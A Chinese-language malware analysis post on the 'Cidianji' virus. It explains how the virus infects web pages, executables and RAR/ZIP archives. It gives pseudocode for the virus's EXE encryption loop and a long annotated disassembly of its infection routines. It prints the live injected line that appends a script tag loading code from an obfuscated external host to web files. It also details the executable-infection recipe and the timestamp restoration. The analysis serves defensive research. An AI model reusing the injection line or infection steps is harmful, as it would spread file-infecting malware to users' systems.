为XXX研究所提供技术支持时截获的样本,com/lsass.exe smss.exe,病毒中文名为磁碟机病毒,貌似很强,此等病毒岂能错过,分析之,不感独乐,遂将感染方式贴上:
感染文件类型:(文件全名后三位)
1 .htm, tml, .js
2 .exe
3 .rar, .zip
web文件感染函数:
1 按行读取web文件内容
2 如果没有找到匹配的:document.write("<ScRiPt src='http://%6A%73%2E%6B%30%31%30%32%2E%63%6F%6D/%30%31%2E%61%73%70'></sCrIpT>"); 则在文件尾部加上这一句。
exe文件感染函数:
被感染的文件包括三个部分:
1)被修改图标资源的病毒体
2)被加密的原文件
3)病毒体
1 取C:/WINDOWS/system32/Com/LSASS.EXE文件信息。
2 读取C:/WINDOWS/system32/Com/LSASS.EXE文件到内存,并修改相应的资源内容,然后写到com/~临时文件中。
3 取待感染文件信息(后面修改文件时间用)。
4 读取待感染文件内容到内存,并进行加密,然后追加到com/~临时文件中。
5 再将C:/WINDOWS/system32/Com/LSASS.EXE文件读入内存,并加密写到com/~临时文件中。
6 将C:/WINDOWS/system32/Com/~临时文件拷贝到被感染文件位置。
//Add on 22:57 2008-1-9
对EXE的加密算法:
dwStart = 21B
g_dwVFileSize
g_dwNeedFilePos
bInfect = TRUE;
/* 每读取g_dwVFileSize个字节再加密的。
*
*/
while (fread(g_dwNeedFilePos/*pBuf*/, 1, g_dwVFileSize, file))
{
if (!bInfect) break;
ECX = dwStart;
ECX += 0x09;
while (1)
{
dwTmp = ECX;
if ECX > g_dwVFileSize
break;
EDX = g_dwNeedFilePos;
ECX += EDX;
byte tmp = Get [ECX];
not tmp;
Set [ECX], tmp;
ECX = dwTmp;
ECX += 0x0B;
}
ECX = 0;
dwTmp = ECX;
if g_dwVFileSize <= ECX
goto aa;
do
{
EDX = g_dwNeedFilePos;
ECX += EDX;
byte tmp = Get[ECX];
not tmp;
Set [ECX], tmp;
ECX = dwTmp;
ECX += 2;
if (ECX >= g_dwVFileSize)
break;
} while (1)
aa:
bInfect = FALSE;
}
//Add end 22:57 2008-1-9
具体分析见如下代码及注释:
/
1 遍历文件函数
00402200 |. 8D85 F4FDFFFF LEA EAX,DWORD PTR SS:[EBP-20C]
00402206 |. 50 PUSH EAX ; /pFindFileData
00402207 |. FF75 CC PUSH DWORD PTR SS:[EBP-34] ; |FileName
0040220A |. FF15 08A14000 CALL DWORD PTR DS:[<&KERNEL32.FindFirstFileA>] ; /FindFirstFileA
00402210 |. 6A 01 PUSH 1 ; /RemoveMsg = PM_REMOVE
00402212 |. 8945 B8 MOV DWORD PTR SS:[EBP-48],EAX ; |
00402215 |. 53 PUSH EBX ; |MsgFilterMax
00402216 |. 53 PUSH EBX ; |MsgFilterMin
00402217 |. 8D85 D8FDFFFF LEA EAX,DWORD PTR SS:[EBP-228] ; |
0040221D |. 53 PUSH EBX ; |hWnd
0040221E |. 50 PUSH EAX ; |pMsg
0040221F |. FF15 30A44000 CALL DWORD PTR DS:[<&USER32.PeekMessageA>] ; /PeekMessageA
00402225 |. 837D B8 FF CMP DWORD PTR SS:[EBP-48],-1
00402229 |. 0F84 BC080000 JE LSASS.00402AEB
0040222F |. BF 58E44000 MOV EDI,LSASS.0040E458 ; ASCII "8A;"
00402234 |> 8D85 20FEFFFF /LEA EAX,DWORD PTR SS:[EBP-1E0]
0040223A |. 68 04D14000 |PUSH LSASS.0040D104 ; /s2 = "."
0040223F |. 50 |PUSH EAX ; |s1
00402240 |. E8 0B650000 |CALL <JMP.&MSVCRT.strcmp> ; /strcmp
00402245 |. 59 |POP ECX
00402246 |. 85C0 |TEST EAX,EAX
00402248 |. 59 |POP ECX
00402249 |. 0F84 7B080000 |JE LSASS.00402ACA
0040224F |. 8D85 20FEFFFF |LEA EAX,DWORD PTR SS:[EBP-1E0]
00402255 |. 68 00D14000 |PUSH LSASS.0040D100 ; /s2 = ".."
0040225A |. 50 |PUSH EAX ; |s1
0040225B |. E8 F0640000 |CALL <JMP.&MSVCRT.strcmp> ; /strcmp
00402260 |. 59 |POP ECX
00402261 |. 85C0 |TEST EAX,EAX
00402263 |. 59 |POP ECX
00402264 |. 0F84 60080000 |JE LSASS.00402ACA
0040226A |. F685 F4FDFFFF 10 |TEST BYTE PTR SS:[EBP-20C],10
00402271 |. 8D85 20FEFFFF |LEA EAX,DWORD PTR SS:[EBP-1E0]
...
004023A7 |. 0F86 1D070000 |JBE LSASS.00402ACA
004023AD |. FF75 C4 |PUSH DWORD PTR SS:[EBP-3C] ; /s2 = "tml"
004023B0 |. FF75 E8 |PUSH DWORD PTR SS:[EBP-18] ; |s1
004023B3 |. FF15 9CA34000 |CALL DWORD PTR DS:[<&MSVCRT._mbsicmp>] ; /_mbsicmp
004023B9 |. 59 |POP ECX
004023BA |. 85C0 |TEST EAX,EAX
004023BC |. 59 |POP ECX
004023BD |. 0F84 9E060000 |JE LSASS.00402A61
004023C3 |. FF75 C8 |PUSH DWORD PTR SS:[EBP-38] ; /s2 = "htm"
004023C6 |. FF75 E8 |PUSH DWORD PTR SS:[EBP-18] ; |s1
004023C9 |. FF15 9CA34000 |CALL DWORD PTR DS:[<&MSVCRT._mbsicmp>] ; /_mbsicmp
004023CF |. 59 |POP ECX
004023D0 |. 85C0 |TEST EAX,EAX
004023D2 |. 59 |POP ECX
004023D3 |. 0F84 88060000 |JE LSASS.00402A61
004023D9 |. 68 ACD14000 |PUSH LSASS.0040D1AC ; /s2 = ".js"
004023DE |. FF75 E8 |PUSH DWORD PTR SS:[EBP-18] ; |s1
004023E1 |. FF15 9CA34000 |CALL DWORD PTR DS:[<&MSVCRT._mbsicmp>] ; /_mbsicmp
004023E7 |. 59 |POP ECX
004023E8 |. 85C0 |TEST EAX,EAX
004023EA |. 59 |POP ECX
004023EB |. 75 6D |JNZ SHORT LSASS.0040245A
004023ED |. 81BD 14FEFFFF 00>|CMP DWORD PTR SS:[EBP-1EC],19000 ; web file infect
004023F7 |. 0F83 CD060000 |JNB LSASS.00402ACA
004023FD |. 51 |PUSH ECX
004023FE |. 8D86 9D010000 |LEA EAX,DWORD PTR DS:[ESI+19D]
00402404 |. 8BCC |MOV ECX,ESP
00402406 |. 8965 E4 |MOV DWORD PTR SS:[EBP-1C],ESP
00402409 |. 50 |PUSH EAX
0040240A |. E8 FB610000 |CALL <JMP.&MFC42.#535_??0CString@@QAE@ABV0@@Z>
0040240F |. 8D45 08 |LEA EAX,DWORD PTR SS:[EBP+8]
00402412 |. 68 08D14000 |PUSH LSASS.0040D108
00402417 |. 50 |PUSH EAX
00402418 |. 8D85 50FFFFFF |LEA EAX,DWORD PTR SS:[EBP-B0]
0040241E |. 50 |PUSH EAX
0040241F |. C645 FC 11 |MOV BYTE PTR SS:[EBP-4],11
00402423 |. E8 06620000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>
00402428 |. 51 |PUSH ECX
00402429 |. 8D95 20FEFFFF |LEA EDX,DWORD PTR SS:[EBP-1E0]
0040242F |. 8BCC |MOV ECX,ESP
00402431 |. 8965 D0 |MOV DWORD PTR SS:[EBP-30],ESP
00402434 |. 52 |PUSH EDX
00402435 |. 50 |PUSH EAX
00402436 |. 51 |PUSH ECX
00402437 |. C645 FC 12 |MOV BYTE PTR SS:[EBP-4],12
0040243B |. E8 EE610000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>
00402440 |. 8BCE |MOV ECX,ESI
00402442 |. C645 FC 13 |MOV BYTE PTR SS:[EBP-4],13
00402446 |. E8 4C070000 |CALL LSASS.00402B97 ; web file infect function
0040244B |. C645 FC 0A |MOV BYTE PTR SS:[EBP-4],0A
0040244F |. 8D8D 50FFFFFF |LEA ECX,DWORD PTR SS:[EBP-B0]
00402455 |. E9 6B060000 |JMP LSASS.00402AC5
0040245A |> 68 A8D14000 |PUSH LSASS.0040D1A8 ; /s2 = "exe"
0040245F |. FF75 E8 |PUSH DWORD PTR SS:[EBP-18] ; |s1
00402462 |. FF15 9CA34000 |CALL DWORD PTR DS:[<&MSVCRT._mbsicmp>] ; /_mbsicmp
00402468 |. 59 |POP ECX
00402469 |. 85C0 |TEST EAX,EAX
0040246B |. 59 |POP ECX
0040246C |. 0F85 6C010000 |JNZ LSASS.004025DE ; exe infect
00402472 |. 8B85 00FEFFFF |MOV EAX,DWORD PTR SS:[EBP-200]
00402478 |. 68 5CE44000 |PUSH LSASS.0040E45C ; ASCII "C:/WINDOWS/system32/com/LSASS.EXE"
0040247D |. 8945 98 |MOV DWORD PTR SS:[EBP-68],EAX
00402480 |. 8B85 04FEFFFF |MOV EAX,DWORD PTR SS:[EBP-1FC]
00402486 |. 8945 9C |MOV DWORD PTR SS:[EBP-64],EAX
00402489 |. 8B85 08FEFFFF |MOV EAX,DWORD PTR SS:[EBP-1F8]
0040248F |. 8945 A4 |MOV DWORD PTR SS:[EBP-5C],EAX
00402492 |. 8B85 0CFEFFFF |MOV EAX,DWORD PTR SS:[EBP-1F4]
00402498 |. 8945 A8 |MOV DWORD PTR SS:[EBP-58],EAX
0040249B |. 8B85 F8FDFFFF |MOV EAX,DWORD PTR SS:[EBP-208]
004024A1 |. 8945 B0 |MOV DWORD PTR SS:[EBP-50],EAX
004024A4 |. 8B85 FCFDFFFF |MOV EAX,DWORD PTR SS:[EBP-204]
004024AA |. 8D8E 78010000 |LEA ECX,DWORD PTR DS:[ESI+178]
004024B0 |. 889E B3010000 |MOV BYTE PTR DS:[ESI+1B3],BL
004024B6 |. 8945 B4 |MOV DWORD PTR SS:[EBP-4C],EAX
004024B9 |. E8 5E610000 |CALL <JMP.&MFC42.#860_??4CString@@QAEABV0@PBD@Z>
004024BE |. 68 A4D14000 |PUSH LSASS.0040D1A4 ; ASCII "/~"
004024C3 |. 8D85 48FFFFFF |LEA EAX,DWORD PTR SS:[EBP-B8]
004024C9 |. 57 |PUSH EDI
004024CA |. 50 |PUSH EAX
004024CB |. E8 5E610000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>
004024D0 |. 8D8E 7C010000 |LEA ECX,DWORD PTR DS:[ESI+17C]
004024D6 |. 50 |PUSH EAX
004024D7 |. C645 FC 14 |MOV BYTE PTR SS:[EBP-4],14
004024DB |. E8 42610000 |CALL <JMP.&MFC42.#858_??4CString@@QAEABV0@ABV0@@Z>
004024E0 |. 8D8D 48FFFFFF |LEA ECX,DWORD PTR SS:[EBP-B8]
004024E6 |. C645 FC 0A |MOV BYTE PTR SS:[EBP-4],0A
004024EA |. E8 0D600000 |CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
004024EF |. 8D85 20FEFFFF |LEA EAX,DWORD PTR SS:[EBP-1E0]
004024F5 |. 50 |PUSH EAX
004024F6 |. 8D45 08 |LEA EAX,DWORD PTR SS:[EBP+8]
004024F9 |. 50 |PUSH EAX
004024FA |. 8D85 40FFFFFF |LEA EAX,DWORD PTR SS:[EBP-C0]
00402500 |. 50 |PUSH EAX
00402501 |. E8 28610000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>
00402506 |. 8D8E 74010000 |LEA ECX,DWORD PTR DS:[ESI+174]
0040250C |. 50 |PUSH EAX
0040250D |. C645 FC 15 |MOV BYTE PTR SS:[EBP-4],15
00402511 |. E8 0C610000 |CALL <JMP.&MFC42.#858_??4CString@@QAEABV0@ABV0@@Z>
00402516 |. 8D8D 40FFFFFF |LEA ECX,DWORD PTR SS:[EBP-C0]
0040251C |. C645 FC 0A |MOV BYTE PTR SS:[EBP-4],0A
00402520 |. E8 D75F0000 |CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
00402525 |. 8BCE |MOV ECX,ESI
00402527 |. E8 1C3E0000 |CALL LSASS.00406348 ; exe file infect function
0040252C |. 84C0 |TEST AL,AL
0040252E |. 74 04 |JE SHORT LSASS.00402534
00402530 |. C645 EF 01 |MOV BYTE PTR SS:[EBP-11],1
00402534 |> 389E B3010000 |CMP BYTE PTR DS:[ESI+1B3],BL
0040253A |. 0F84 8C000000 |JE LSASS.004025CC
00402540 |. 53 |PUSH EBX
00402541 |. 51 |PUSH ECX
00402542 |. 8D8D 20FEFFFF |LEA ECX,DWORD PTR SS:[EBP-1E0]
00402548 |. 8BC4 |MOV EAX,ESP
0040254A |. 8965 E4 |MOV DWORD PTR SS:[EBP-1C],ESP
0040254D |. 51 |PUSH ECX
0040254E |. 8D4D 08 |LEA ECX,DWORD PTR SS:[EBP+8]
00402551 |. 51 |PUSH ECX
00402552 |. 50 |PUSH EAX
00402553 |. E8 D6600000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>
00402558 |. E8 64F8FFFF |CALL LSASS.00401DC1 ; setFileAttributes
0040255D |. 59 |POP ECX
0040255E |. 8D86 74010000 |LEA EAX,DWORD PTR DS:[ESI+174]
00402564 |. 8BCC |MOV ECX,ESP
00402566 |. 8965 E4 |MOV DWORD PTR SS:[EBP-1C],ESP
00402569 |. 50 |PUSH EAX
0040256A |. E8 9B600000 |CALL <JMP.&MFC42.#535_??0CString@@QAE@ABV0@@Z>
0040256F |. 51 |PUSH ECX
00402570 |. 8D86 7C010000 |LEA EAX,DWORD PTR DS:[ESI+17C]
00402576 |. 8BCC |MOV ECX,ESP
00402578 |. 8965 D0 |MOV DWORD PTR SS:[EBP-30],ESP
0040257B |. 50 |PUSH EAX
0040257C |. C645 FC 16 |MOV BYTE PTR SS:[EBP-4],16
00402580 |. E8 85600000 |CALL <JMP.&MFC42.#535_??0CString@@QAE@ABV0@@Z>
00402585 |. 8BCE |MOV ECX,ESI
00402587 |. C645 FC 0A |MOV BYTE PTR SS:[EBP-4],0A
0040258B |. E8 4E070000 |CALL LSASS.00402CDE ; copy com/~ to original path
00402590 |. 8B86 74010000 |MOV EAX,DWORD PTR DS:[ESI+174]
00402596 |. 53 |PUSH EBX ; /hTemplateFile
00402597 |. 68 80000000 |PUSH 80 ; |Attributes = NORMAL
0040259C |. 6A 03 |PUSH 3 ; |Mode = OPEN_EXISTING
0040259E |. 53 |PUSH EBX ; |pSecurity
0040259F |. 6A 03 |PUSH 3 ; |ShareMode = FILE_SHARE_READ|FILE_SHARE_WRITE
004025A1 |. 68 000000C0 |PUSH C0000000 ; |Access = GENERIC_READ|GENERIC_WRITE
004025A6 |. 50 |PUSH EAX ; |FileName
004025A7 |. FF15 E8A04000 |CALL DWORD PTR DS:[<&KERNEL32.CreateFileA>] ; /CreateFileA
004025AD |. 8D4D A4 |LEA ECX,DWORD PTR SS:[EBP-5C]
004025B0 |. 8945 D0 |MOV DWORD PTR SS:[EBP-30],EAX
004025B3 |. 51 |PUSH ECX ; /pLastWrite
004025B4 |. 8D4D 98 |LEA ECX,DWORD PTR SS:[EBP-68] ; |
004025B7 |. 51 |PUSH ECX ; |pLastAccess
004025B8 |. 8D4D B0 |LEA ECX,DWORD PTR SS:[EBP-50] ; |
004025BB |. 51 |PUSH ECX ; |pCreationTime
004025BC |. 50 |PUSH EAX ; |hFile
004025BD |. FF15 14A14000 |CALL DWORD PTR DS:[<&KERNEL32.SetFileTime>] ; /SetFileTime
004025C3 |. FF75 D0 |PUSH DWORD PTR SS:[EBP-30] ; /hObject
004025C6 |. FF15 74A04000 |CALL DWORD PTR DS:[<&KERNEL32.CloseHandle>] ; /CloseHandle
004025CC |> FFB6 7C010000 |PUSH DWORD PTR DS:[ESI+17C] ; /path
004025D2 |. FF15 58A34000 |CALL DWORD PTR DS:[<&MSVCRT._unlink>] ; /_unlink
004025D8 |. 59 |POP ECX
004025D9 |. E9 EC040000 |JMP LSASS.00402ACA
004025DE |> 68 A0D14000 |PUSH LSASS.0040D1A0 ; /s2 = "rar"
004025E3 |. FF75 E8 |PUSH DWORD PTR SS:[EBP-18] ; |s1
004025E6 |. FF15 9CA34000 |CALL DWORD PTR DS:[<&MSVCRT._mbsicmp>] ; /_mbsicmp
004025EC |. 59 |POP ECX
004025ED |. 85C0 |TEST EAX,EAX
004025EF |. 59 |POP ECX
004025F0 |. 74 18 |JE SHORT LSASS.0040260A
004025F2 |. 68 9CD14000 |PUSH LSASS.0040D19C ; /s2 = "zip"
004025F7 |. FF75 E8 |PUSH DWORD PTR SS:[EBP-18] ; |s1
004025FA |. FF15 9CA34000 |CALL DWORD PTR DS:[<&MSVCRT._mbsicmp>] ; /_mbsicmp
00402600 |. 59 |POP ECX
00402601 |. 85C0 |TEST EAX,EAX
00402603 |. 59 |POP ECX
00402604 |. 0F85 C0040000 |JNZ LSASS.00402ACA
0040260A |> 8B86 A6010000 |MOV EAX,DWORD PTR DS:[ESI+1A6]
00402610 |. 68 10F44000 |PUSH LSASS.0040F410 ; /s2 = "c:/program files/winrar/winrar.exe"
00402615 |. 50 |PUSH EAX ; |s1
00402616 |. FF15 A0A34000 |CALL DWORD PTR DS:[<&MSVCRT._mbscmp>] ; /_mbscmp
0040261C |. 59 |POP ECX
0040261D |. 85C0 |TEST EAX,EAX
0040261F |. 59 |POP ECX
00402620 |. 0F84 A4040000 |JE LSASS.00402ACA
00402626 |. 399E AA010000 |CMP DWORD PTR DS:[ESI+1AA],EBX ; rar, zip file infect
0040262C |. 0F8F 98040000 |JG LSASS.00402ACA
00402632 |. 81BD 14FEFFFF 00>|CMP DWORD PTR SS:[EBP-1EC],500000
0040263C |. 0F87 88040000 |JA LSASS.00402ACA
00402642 |. 8D85 20FEFFFF |LEA EAX,DWORD PTR SS:[EBP-1E0]
00402648 |. 50 |PUSH EAX
00402649 |. 8D45 08 |LEA EAX,DWORD PTR SS:[EBP+8]
0040264C |. 50 |PUSH EAX
0040264D |. 8D85 34FFFFFF |LEA EAX,DWORD PTR SS:[EBP-CC]
00402653 |. 50 |PUSH EAX
00402654 |. E8 D55F0000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>
00402659 |. 50 |PUSH EAX
0040265A |. 8D4D D8 |LEA ECX,DWORD PTR SS:[EBP-28]
0040265D |. C645 FC 17 |MOV BYTE PTR SS:[EBP-4],17
00402661 |. E8 BC5F0000 |CALL <JMP.&MFC42.#858_??4CString@@QAEABV0@ABV0@@Z>
00402666 |. 8D8D 34FFFFFF |LEA ECX,DWORD PTR SS:[EBP-CC]
0040266C |. C645 FC 0A |MOV BYTE PTR SS:[EBP-4],0A
00402670 |. E8 875E0000 |CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
00402675 |. 68 94D14000 |PUSH LSASS.0040D194 ; ASCII "/bak/"
0040267A |. 8D85 7CFFFFFF |LEA EAX,DWORD PTR SS:[EBP-84]
00402680 |. 57 |PUSH EDI
00402681 |. 50 |PUSH EAX
00402682 |. E8 A75F0000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>
00402687 |. 8D8D 20FEFFFF |LEA ECX,DWORD PTR SS:[EBP-1E0]
0040268D |. C645 FC 18 |MOV BYTE PTR SS:[EBP-4],18
00402691 |. 51 |PUSH ECX
00402692 |. 50 |PUSH EAX
00402693 |. 8D85 54FFFFFF |LEA EAX,DWORD PTR SS:[EBP-AC]
00402699 |. 50 |PUSH EAX
0040269A |. E8 8F5F0000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>
0040269F |. 68 08D14000 |PUSH LSASS.0040D108
004026A4 |. 50 |PUSH EAX
004026A5 |. 8D45 94 |LEA EAX,DWORD PTR SS:[EBP-6C]
004026A8 |. C645 FC 19 |MOV BYTE PTR SS:[EBP-4],19
004026AC |. 50 |PUSH EAX
004026AD |. E8 7C5F0000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>
004026B2 |. 50 |PUSH EAX
004026B3 |. 8D4D DC |LEA ECX,DWORD PTR SS:[EBP-24]
004026B6 |. C645 FC 1A |MOV BYTE PTR SS:[EBP-4],1A
004026BA |. E8 635F0000 |CALL <JMP.&MFC42.#858_??4CString@@QAEABV0@ABV0@@Z>
004026BF |. 8D4D 94 |LEA ECX,DWORD PTR SS:[EBP-6C]
004026C2 |. C645 FC 19 |MOV BYTE PTR SS:[EBP-4],19
004026C6 |. E8 315E0000 |CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
004026CB |. 8D8D 54FFFFFF |LEA ECX,DWORD PTR SS:[EBP-AC]
004026D1 |. C645 FC 18 |MOV BYTE PTR SS:[EBP-4],18
004026D5 |. E8 225E0000 |CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
004026DA |. 8D8D 7CFFFFFF |LEA ECX,DWORD PTR SS:[EBP-84]
004026E0 |. C645 FC 0A |MOV BYTE PTR SS:[EBP-4],0A
004026E4 |. E8 135E0000 |CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
004026E9 |. 8D45 D8 |LEA EAX,DWORD PTR SS:[EBP-28]
004026EC |. 50 |PUSH EAX
004026ED |. 8D85 6CFFFFFF |LEA EAX,DWORD PTR SS:[EBP-94]
004026F3 |. 68 8CD14000 |PUSH LSASS.0040D18C ; ASCII " X ""
004026F8 |. 50 |PUSH EAX
004026F9 |. E8 365F0000 |CALL <JMP.&MFC42.#926_??H@YG?AVCString@@PBDABV0@@Z>
004026FE |. 68 88D14000 |PUSH LSASS.0040D188 ; ASCII "" ""
00402703 |. 50 |PUSH EAX
00402704 |. 8D85 4CFFFFFF |LEA EAX,DWORD PTR SS:[EBP-B4]
0040270A |. C645 FC 1B |MOV BYTE PTR SS:[EBP-4],1B
0040270E |. 50 |PUSH EAX
0040270F |. E8 1A5F0000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>
00402714 |. 8D4D DC |LEA ECX,DWORD PTR SS:[EBP-24]
00402717 |. C645 FC 1C |MOV BYTE PTR SS:[EBP-4],1C
0040271B |. 51 |PUSH ECX
0040271C |. 50 |PUSH EAX
0040271D |. 8D85 74FFFFFF |LEA EAX,DWORD PTR SS:[EBP-8C]
00402723 |. 50 |PUSH EAX
00402724 |. E8 FF5E0000 |CALL <JMP.&MFC42.#922_??H@YG?AVCString@@ABV0@0@Z>
00402729 |. 68 74D14000 |PUSH LSASS.0040D174 ; ASCII "" -r -inul -ibck -y"
0040272E |. 50 |PUSH EAX
0040272F |. 8D85 3CFFFFFF |LEA EAX,DWORD PTR SS:[EBP-C4]
00402735 |. C645 FC 1D |MOV BYTE PTR SS:[EBP-4],1D
00402739 |. 50 |PUSH EAX
0040273A |. E8 EF5E0000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>
0040273F |. C645 FC 1E |MOV BYTE PTR SS:[EBP-4],1E
00402743 |. 50 |PUSH EAX
00402744 |. 8D4D D4 |LEA ECX,DWORD PTR SS:[EBP-2C]
00402747 |. E8 D65E0000 |CALL <JMP.&MFC42.#858_??4CString@@QAEABV0@ABV0@@Z>
0040274C |. 8D8D 3CFFFFFF |LEA ECX,DWORD PTR SS:[EBP-C4]
00402752 |. C645 FC 1D |MOV BYTE PTR SS:[EBP-4],1D
00402756 |. E8 A15D0000 |CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
0040275B |. 8D8D 74FFFFFF |LEA ECX,DWORD PTR SS:[EBP-8C]
00402761 |. C645 FC 1C |MOV BYTE PTR SS:[EBP-4],1C
00402765 |. E8 925D0000 |CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
0040276A |. 8D8D 4CFFFFFF |LEA ECX,DWORD PTR SS:[EBP-B4]
00402770 |. C645 FC 1B |MOV BYTE PTR SS:[EBP-4],1B
00402774 |. E8 835D0000 |CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
00402779 |. 8D8D 6CFFFFFF |LEA ECX,DWORD PTR SS:[EBP-94]
0040277F |. C645 FC 0A |MOV BYTE PTR SS:[EBP-4],0A
00402783 |. E8 745D0000 |CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
00402788 |. 8D45 D4 |LEA EAX,DWORD PTR SS:[EBP-2C]
0040278B |. 50 |PUSH EAX
0040278C |. 8D86 A6010000 |LEA EAX,DWORD PTR DS:[ESI+1A6]
00402792 |. 50 |PUSH EAX
00402793 |. 8D85 38FFFFFF |LEA EAX,DWORD PTR SS:[EBP-C8]
00402799 |. 50 |PUSH EAX
0040279A |. E8 895E0000 |CALL <JMP.&MFC42.#922_??H@YG?AVCString@@ABV0@0@Z>
0040279F |. FF30 |PUSH DWORD PTR DS:[EAX] ; /src
004027A1 |. 8D85 50EAFFFF |LEA EAX,DWORD PTR SS:[EBP-15B0] ; |
004027A7 |. 50 |PUSH EAX ; |dest
004027A8 |. E8 5F5F0000 |CALL <JMP.&MSVCRT.strcpy> ; /strcpy
004027AD |. 59 |POP ECX
004027AE |. 59 |POP ECX
004027AF |. 8D8D 38FFFFFF |LEA ECX,DWORD PTR SS:[EBP-C8]
004027B5 |. E8 425D0000 |CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
004027BA |. 53 |PUSH EBX ; /Arg5
004027BB |. 53 |PUSH EBX ; |Arg4
004027BC |. 8D85 50EAFFFF |LEA EAX,DWORD PTR SS:[EBP-15B0] ; |
004027C2 |. 53 |PUSH EBX ; |Arg3
004027C3 |. 50 |PUSH EAX ; |Arg2
004027C4 |. 53 |PUSH EBX ; |Arg1
004027C5 |. 8BCE |MOV ECX,ESI ; |
004027C7 |. E8 2F410000 |CALL LSASS.004068FB ; /LSASS.004068FB
004027CC |. 85C0 |TEST EAX,EAX ; unpack rar/zip file
004027CE |. 74 40 |JE SHORT LSASS.00402810
004027D0 |. 68 94D14000 |PUSH LSASS.0040D194 ; ASCII "/bak/"
004027D5 |. 8D85 64FFFFFF |LEA EAX,DWORD PTR SS:[EBP-9C]
004027DB |. 57 |PUSH EDI
004027DC |. 50 |PUSH EAX
004027DD |. E8 4C5E0000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>
004027E2 |. 51 |PUSH ECX
004027E3 |. 8D95 20FEFFFF |LEA EDX,DWORD PTR SS:[EBP-1E0]
004027E9 |. 8BCC |MOV ECX,ESP
004027EB |. 8965 E4 |MOV DWORD PTR SS:[EBP-1C],ESP
004027EE |. 52 |PUSH EDX
004027EF |. 50 |PUSH EAX
004027F0 |. 51 |PUSH ECX
004027F1 |. C645 FC 1F |MOV BYTE PTR SS:[EBP-4],1F
004027F5 |. E8 345E0000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>
004027FA |. 8BCE |MOV ECX,ESI
004027FC |. E8 E0F5FFFF |CALL LSASS.00401DE1
00402801 |. C645 FC 0A |MOV BYTE PTR SS:[EBP-4],0A
00402805 |. 8D8D 64FFFFFF |LEA ECX,DWORD PTR SS:[EBP-9C]
0040280B |. E9 B5020000 |JMP LSASS.00402AC5
00402810 |> A1 08F44000 |MOV EAX,DWORD PTR DS:[40F408]
00402815 |. 51 |PUSH ECX
00402816 |. 8945 E4 |MOV DWORD PTR SS:[EBP-1C],EAX
00402819 |. A1 04F44000 |MOV EAX,DWORD PTR DS:[40F404]
0040281E |. FF86 AA010000 |INC DWORD PTR DS:[ESI+1AA]
00402824 |. 8945 D0 |MOV DWORD PTR SS:[EBP-30],EAX
00402827 |. 8D45 DC |LEA EAX,DWORD PTR SS:[EBP-24]
0040282A |. 8BCC |MOV ECX,ESP
0040282C |. 8965 BC |MOV DWORD PTR SS:[EBP-44],ESP
0040282F |. 50 |PUSH EAX
00402830 |. E8 D55D0000 |CALL <JMP.&MFC42.#535_??0CString@@QAE@ABV0@@Z>
00402835 |. 8BCE |MOV ECX,ESI
00402837 |. E8 85F8FFFF |CALL LSASS.004020C1
0040283C |. 8B45 D0 |MOV EAX,DWORD PTR SS:[EBP-30]
0040283F |. 3905 04F44000 |CMP DWORD PTR DS:[40F404],EAX
00402845 |. 7F 4B |JG SHORT LSASS.00402892
00402847 |. 8B45 E4 |MOV EAX,DWORD PTR SS:[EBP-1C]
0040284A |. 3905 08F44000 |CMP DWORD PTR DS:[40F408],EAX
00402850 |. 7F 40 |JG SHORT LSASS.00402892
00402852 |. 68 94D14000 |PUSH LSASS.0040D194 ; ASCII "/bak/"
00402857 |. 8D85 5CFFFFFF |LEA EAX,DWORD PTR SS:[EBP-A4]
0040285D |. 57 |PUSH EDI
0040285E |. 50 |PUSH EAX
0040285F |. E8 CA5D0000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>
00402864 |. 51 |PUSH ECX
00402865 |. 8D95 20FEFFFF |LEA EDX,DWORD PTR SS:[EBP-1E0]
0040286B |. 8BCC |MOV ECX,ESP
0040286D |. 8965 BC |MOV DWORD PTR SS:[EBP-44],ESP
00402870 |. 52 |PUSH EDX
00402871 |. 50 |PUSH EAX
00402872 |. 51 |PUSH ECX
00402873 |. C645 FC 26 |MOV BYTE PTR SS:[EBP-4],26
00402877 |. E8 B25D0000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>
0040287C |. 8BCE |MOV ECX,ESI
0040287E |. E8 5EF5FFFF |CALL LSASS.00401DE1
00402883 |. C645 FC 0A |MOV BYTE PTR SS:[EBP-4],0A
00402887 |. 8D8D 5CFFFFFF |LEA ECX,DWORD PTR SS:[EBP-A4]
0040288D |. E9 C2010000 |JMP LSASS.00402A54
00402892 |> 8D45 D8 |LEA EAX,DWORD PTR SS:[EBP-28]
00402895 |. 50 |PUSH EAX
00402896 |. 8D85 78FFFFFF |LEA EAX,DWORD PTR SS:[EBP-88]
0040289C |. 68 6CD14000 |PUSH LSASS.0040D16C ; ASCII " A ""
004028A1 |. 50 |PUSH EAX
004028A2 |. E8 8D5D0000 |CALL <JMP.&MFC42.#926_??H@YG?AVCString@@PBDABV0@@Z>
